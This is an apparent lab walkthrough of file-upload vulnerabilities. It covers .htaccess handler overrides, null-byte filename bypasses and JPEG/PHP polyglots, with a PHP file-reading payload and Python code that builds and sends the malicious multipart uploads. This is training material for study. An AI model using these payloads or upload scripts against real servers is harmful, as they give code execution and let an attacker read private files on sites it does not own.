Vulnerabilities

Exploiting the vulnerabilities...

File Upload Vulnerability


1. If the server runs Apache (override the PHP handler with .htaccess):

Create a file exploit.php

<?php echo file_get_contents('/home/carlos/secret'); ?>

Find the request that says:

POST /my-account/avatar ...

Change the value of the filename parameter to .htaccess.

Change the value of the Content-Type header of the file part to text/plain.

Replace the contents of the file (PHP payload) with the following Apache directive:

AddType application/x-httpd-php .l33t

Now restore the PHP payload as the file contents, change the value of the filename parameter from exploit.php to exploit.l33t, and send the request again. Because of the AddType directive, Apache now executes exploit.l33t as PHP; fetch it (GET /files/avatars/exploit.l33t) to read the secret.


2. If a blacklist rejects the extension, put a null byte between the real extension and an allowed one:

Request you have to change:

POST /my-account/avatar ...

In the Content-Disposition header, change the value of the filename parameter to include a URL-encoded null byte, followed by the .jpg extension (exploit.php%00.jpg). The extension check sees .jpg, but if the name is URL-decoded and then handled by code that treats the null byte as a string terminator, the file is stored as exploit.php.

Send the request again.
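The following is an added example, not code from the original page or from the lab: it builds the multipart/form-data bodies that steps 1 and 2 tell you to edit in Burp Repeater, so the exact placement of the filename, the part's Content-Type header and the %00 is visible. The form field names ("avatar", "user", "csrf"), the cookie, the boundary and the payload are assumptions; take the real values from the intercepted POST /my-account/avatar request.

```python
# Added example (not from the original page). Hand-builds the multipart bodies
# for the .htaccess override (step 1) and the null-byte filename (step 2).
# Field names "avatar", "user" and "csrf" are assumptions; copy the real ones
# from the intercepted request.
import http.client

PHP_PAYLOAD = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
HTACCESS = b"AddType application/x-httpd-php .l33t\n"
BOUNDARY = b"----WebKitFormBoundaryExample"  # assumed; any unique token works


def build_multipart(boundary, text_fields, file_field, filename, content_type, data):
    """Return a multipart/form-data body (bytes) with text fields and one file part.

    `filename` is inserted verbatim, so a URL-encoded null byte such as
    exploit.php%00.jpg reaches the server exactly as typed (a browser would
    never send that, which is why the request is edited in Burp).
    """
    crlf = b"\r\n"
    parts = []
    for name, value in text_fields.items():
        parts.append(
            b"--" + boundary + crlf
            + b'Content-Disposition: form-data; name="' + name.encode() + b'"' + crlf
            + crlf + value.encode() + crlf
        )
    # The Content-Type here is the part header step 1 changes to text/plain.
    parts.append(
        b"--" + boundary + crlf
        + b'Content-Disposition: form-data; name="' + file_field.encode()
        + b'"; filename="' + filename.encode() + b'"' + crlf
        + b"Content-Type: " + content_type.encode() + crlf
        + crlf + data + crlf
    )
    parts.append(b"--" + boundary + b"--" + crlf)
    return b"".join(parts)


def htaccess_attack_bodies(user="wiener", csrf="TOKEN"):
    """Step 1: the two uploads, in order. Returns (htaccess_body, l33t_body)."""
    fields = {"user": user, "csrf": csrf}
    first = build_multipart(BOUNDARY, fields, "avatar", ".htaccess", "text/plain", HTACCESS)
    second = build_multipart(BOUNDARY, fields, "avatar", "exploit.l33t",
                             "application/x-php", PHP_PAYLOAD)
    return first, second


def null_byte_body(user="wiener", csrf="TOKEN"):
    """Step 2: one upload whose filename carries %00 before the allowed extension."""
    return build_multipart(BOUNDARY, {"user": user, "csrf": csrf}, "avatar",
                           "exploit.php%00.jpg", "image/jpeg", PHP_PAYLOAD)


def post_upload(host, body, cookie, path="/my-account/avatar", boundary=BOUNDARY, https=True):
    """Send one built body to a live target (needs network; not exercised here)."""
    conn = (http.client.HTTPSConnection if https else http.client.HTTPConnection)(host)
    conn.request("POST", path, body=body, headers={
        "Content-Type": "multipart/form-data; boundary=" + boundary.decode(),
        "Cookie": cookie,
    })
    resp = conn.getresponse()
    return resp.status, resp.read()


if __name__ == "__main__":
    htaccess_body, l33t_body = htaccess_attack_bodies()
    print(htaccess_body.decode())
    print(null_byte_body().decode(errors="replace"))
```

Send the bodies in the order shown for step 1 (the .htaccess upload must land before exploit.l33t is requested), then GET /files/avatars/exploit.l33t or /files/avatars/exploit.php with the same session cookie. If the null-byte upload is stored under its full literal name, the server did not decode the %00 and this trick does not apply.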


3. If the server checks that the upload is a real image:

Create an image file containing a PHP payload with the help of ExifTool, replacing <YOUR-INPUT-IMAGE>.jpg in the command with your own image file:

Upload polyglot.php as your avatar. In Burp's proxy history, find the GET /files/avatars/polyglot.php request. Use the message editor's search feature to find the START string somewhere within the binary image data in the response; the secret is between this and the END string. If you find the PHP source itself between START and END, the file was served as-is rather than executed.
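The following is an added example, not code from the original page or from ExifTool: it builds a JPEG/PHP polyglot the same way ExifTool's -Comment option does, by writing the payload into a JPEG COM segment directly after the SOI marker, then parses the segments back to confirm the JPEG signature is intact and the payload is present, and finally does the START/END extraction from the response. The minimal JPEG and the response are constructed here; the START/END payload wording is an assumption.

```python
# Added example (not from the original page). Builds a JPEG/PHP polyglot by
# inserting the PHP payload as a COM segment after SOI, the same structure
# ExifTool -Comment produces, and extracts the secret from a served response.
import struct

# Assumed payload: wraps the secret in START/END so it can be found in binary data.
PAYLOAD = b"<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>"

SOI = b"\xff\xd8"   # JPEG signature; what a magic-byte check inspects
EOI = b"\xff\xd9"
COM = 0xFE          # comment segment marker


def jpeg_segment(marker, body):
    """Marker + 2-byte big-endian length (which includes the length field) + body."""
    if len(body) + 2 > 0xFFFF:
        raise ValueError("segment body too long for a JPEG segment")
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(body) + 2) + body


def make_polyglot(image, payload=PAYLOAD):
    """Insert the payload as a COM segment directly after the SOI of `image`."""
    if image[:2] != SOI:
        raise ValueError("not a JPEG (missing SOI)")
    return SOI + jpeg_segment(COM, payload) + image[2:]


def iter_segments(data):
    """Yield (marker, body) for each header segment up to SOS (0xDA) or EOI."""
    pos = 2  # skip SOI
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI, or start of scan: entropy-coded data follows
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length


def comments(data):
    """All COM segment bodies, i.e. where the PHP payload lives in the polyglot."""
    return [body for marker, body in iter_segments(data) if marker == COM]


def extract_secret(response_body):
    """Return the text between 'START ' and ' END' in the served file, or None."""
    start = response_body.find(b"START ")
    end = response_body.find(b" END", start)
    if start == -1 or end == -1:
        return None
    return response_body[start + len(b"START "):end].decode(errors="replace")


# Constructed minimal JPEG: SOI, a JFIF APP0 header, EOI. Use a real image for
# a server that fully decodes the upload rather than checking the signature.
MINIMAL_JPEG = SOI + jpeg_segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00") + EOI


if __name__ == "__main__":
    polyglot = make_polyglot(MINIMAL_JPEG)
    with open("polyglot.php", "wb") as f:
        f.write(polyglot)
    print("signature ok:", polyglot[:2] == SOI)
    print("comment segments:", comments(polyglot))
```

ExifTool produces the equivalent file with `exiftool -Comment="<payload>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php`. Run extract_secret over the raw response body of GET /files/avatars/polyglot.php; because the PHP source itself contains the START and END markers, a result that reads like PHP code means the file was served rather than executed.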
